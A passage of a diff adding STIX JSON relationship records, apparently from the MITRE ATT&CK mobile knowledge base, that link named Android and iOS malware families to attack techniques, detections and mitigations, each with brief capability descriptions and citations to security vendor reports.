"3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc0d86de-0642-4cbf-a785-7ff70507a9a2", + "created": "2023-03-20T18:51:44.864Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:44.864Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b110d919-acd4-4fe0-a46a-ac4819508667", + "created": "2020-07-20T13:58:53.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:35.992Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) has been installed via a malicious configuration profile.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1a9db79-4a80-4e65-91bf-72e358d2ce41", + "created": "2023-01-18T21:43:36.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-21T18:44:26.569Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can download attacker-specified files.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--81db3270-4cb8-4982-8ff8-c28a874e8421", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DressCode](https://attack.mitre.org/software/S0300) sets up a \"general purpose tunnel\" that can be used by an adversary to compromise enterprise networks that the mobile device is connected to.(Citation: TrendMicro-DressCode)", + "relationship_type": "uses", + "source_ref": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d12ee41-9ac0-4083-bc28-6568be4b9d5b", + "created": "2023-03-20T18:41:56.287Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:56.287Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d0c21324-62e3-46e5-823b-ea0c03a4885d", + "type": "relationship", + "created": "2020-01-21T15:30:39.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "modified": "2020-01-21T15:30:39.335Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can download attacker-specified files.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd", + "created": "2020-06-26T14:55:13.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:38.924Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) registers for the `BOOT_COMPLETED` intent to auto-start after the device boots.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--142532a6-bf7c-4b25-be23-16f01160f3c5", + "type": "relationship", + "created": "2020-09-15T15:18:12.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.417Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect account information stored on the device, as well as data in external storage.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a111ab3c-97f2-4b17-b291-f141e9b7613f", + "created": "2022-04-01T12:50:48.459Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T12:50:48.459Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--876fc8ee-aeae-4d4b-b4ce-541b432e5298", + "created": "2020-12-14T15:02:35.297Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T18:06:30.456Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect the device’s contact list.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51f75dd5-b584-482f-8f7f-dbee2d5cf6f3", + "created": "2019-10-18T15:51:48.487Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as keyboard registration or accessibility service access.", + "modified": "2022-04-05T19:42:51.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6961eec4-8e31-4be1-88d9-dca682e38b8c", + "created": "2019-08-09T18:02:06.688Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) can capture video using device cameras.(Citation: Zscaler-SuperMarioRun)", + "modified": "2022-05-20T17:13:16.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1987b242-c868-40b2-993d-9dbeea311d4b", + "created": "2022-03-30T14:08:09.882Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:08:09.882Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50f03c00-5488-49fe-a527-a8776e526523", + "type": "relationship", + "created": "2020-11-24T17:55:12.820Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.820Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect a list of installed applications.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d59da983-c521-47b6-83ab-435f7d58611d", + "created": "2019-11-21T16:42:48.493Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:57.861Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) uses HTTP requests for C2 communication.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb51161a-ef2e-41a4-b5f9-bd1f64f95674", + "type": "relationship", + "created": "2020-12-24T22:04:28.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.025Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has retrieved .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files from external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d724bcf3-25d2-406a-b612-333fea5e2385", + "created": "2020-10-29T17:48:27.440Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) can show phishing popups when a targeted application is running.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dbeff88d-441f-47f9-8afc-60400ee3ab97", + "created": "2023-02-06T19:06:37.359Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:06:37.359Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can receive files from the C2 at runtime.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1348c744-3127-4a55-a5b4-2f439f41e941", + "created": "2020-07-27T14:14:56.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:48:16.775Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can install itself on the system partition to achieve persistence. [Zen](https://attack.mitre.org/software/S0494) can also replace `framework.jar`, which allows it to intercept and modify the behavior of the standard Android API.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--55b3df0f-252d-4208-bdb8-91fa1e1119b4", + "created": "2021-01-05T20:16:20.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:23:12.919Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can execute commands .(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--430b2b14-9d63-401c-b76b-d0247ee7e27b", + "type": "relationship", + "created": "2020-07-20T13:27:33.549Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.524Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can record the screen and take screenshots to capture messages from Line, Facebook Messenger, and WhatsApp.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cc3cf438-7206-46df-a4a4-999472ea6a9a", + "created": "2019-11-21T19:16:34.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:42.081Z", + "description": "[SimBad](https://attack.mitre.org/software/S0419) hides its icon from the application launcher.(Citation: CheckPoint SimBad 2019)", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:50:54.500Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a2365c91-60f6-4249-af13-6bc2fdb80d52", + "created": "2019-09-23T13:36:08.459Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can use phishing overlays to capture users' credit card information.(Citation: securelist rotexy 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa628e44-ff05-4ac9-bb0b-11c22384a443", + "created": "2020-07-20T13:49:03.676Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) has fetched its C2 address from encoded Twitter names, as well as Instagram and Tumblr.(Citation: TrendMicro-XLoader-FakeSpy)", + "modified": "2022-04-20T17:58:16.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8244700e-6f96-463a-a9c3-810c489a2c60", + "created": "2023-03-20T15:20:24.554Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:20:24.554Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--437f719c-d602-4cb8-a2b9-c33e85ad7c50", + "created": "2020-06-26T15:32:25.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:43.629Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can obtain the device’s contact list.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": 